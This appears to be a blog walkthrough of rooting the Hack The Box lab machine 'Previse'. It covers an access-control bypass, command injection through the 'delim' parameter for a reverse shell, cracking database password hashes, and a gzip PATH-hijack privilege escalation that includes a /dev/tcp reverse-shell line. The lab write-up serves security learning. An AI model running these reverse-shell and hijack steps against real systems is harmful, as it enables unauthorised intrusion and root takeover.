5 min readApr 3, 2022


The new linux machine is called Previse on HTB and I’m going to root it today.

As usual I started the nmap scan and got this:

By checking the webpage on port 80 I found a simple login page nothing more

running the buster to check for any available directories I found


css and js weren’t useful but when I opened nav.php I found this

Create account is the eye catcher here but it still redirects us to /login.php again time to check the request from another view

After trying some different ways and different links here is what I reached to:

After sending the request and finding this 302 request I was kinda confused but

After a lot of searching I found a way to get it /account.php and it’s to change the response header from 302 to 200 check this blog to know how to do it

Now after creating the account I’m able to access all directories above and I found in files

I downloaded it to check what does it contain and I found there some credentials

root username and it’s password (Must have a shell to use these credentials)

After a lot literally hours of searching and trying different ways to get in this machine I saw a parameter called delim in logs.php where I think we can inject with some code to get a reverse shell

Now we go to the /file_logs.php and intercept the request after pressing submit setting delim as comma

The request should be like this before injecting

Now we add out injector code in delim parameter…But first we need to start a server on our attacking machine and create a rev shell there

python3 -m http.server 9191

Here is the request after injecting our code

Now we set our listener on the port we specified in the reverse shell then forward the request

nc -lvnp <port>

It worked and I got the shell I was looking for as www-data now we can use the credentials we found before for mysql database

You can find them again in the file called config.php

The credential were correct and we logged in successfully now search for any other credentials in this data base

show tables;
#this command will display the tables in our database
mysql> show tables;
show tables;
| Tables_in_previse |
| accounts |
| files |
2 rows in set (0.00 sec)

Here we got 2 tables accounts and files let’s check what is in accounts maybe we can find more credentials

mysql> SELECT * FROM accounts;                                                                                      
SELECT * FROM accounts;
| id | username | password | created_at |
| 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 |
| 2 | far1s | $1$🧂llol$J.VmdoVZ4IjW4C57oRv1m0 | 2021-08-05 13:10:08 |
2 rows in set (0.00 sec)

Finally one more step forward now we have one more username which is m4lwhere and it’s password

Running hashcat and john the ripper and let them find this password for us using rockyou.txt

#cracking using john the ripper:
john -format=md5crypt-long --wordlist=/usr/share/wordlists/rockyou.txt m4lwherepasswd.txt
#cracking using hashcathashcat -a 0 -m 500 m4lwherepasswd.txt /usr/share/wordlists/rockyou.txt

Both took approximately half an hour but hashcat was 3 minutes faster so we gonna meow tool won this time

Now we login via ssh as user m4lwhere

ssh m4lwhere@previse.htb password: ilovecody112235!

Here is the first flag now we must find a way to be a root and get the 2nd flag

Cool we can run as root

Reading this bash file we can see here that this file run with cron and it runs as root

gzip -c “write on standard output, keep original files unchanged”

After some searching I found something called path injection and it could be useful in our situation it’s a bit complex to understand but practice makes perfect.

First we need to be in a directory where we can have more privileges like /tmp

Now we create our file called gzip and add a bash shell in there so it should be like:

/bin/sh -i >& /dev/tcp/<IP>/2424 0>&1

Then we edit the default path to $pwd:.:$PATH

export PATH=$(pwd):.:$PATH

All done?.. don’t forget to change the gzip permissions chmod +x gzip now we are ready run the listener on another terminal and run the as sudo.

attacking machine : nc -lvnp <PORt>
ssh shell : sudo /opt/scripts/

And Bingo congrats on rooting the machine …

Respect on HTB it won’t take a minute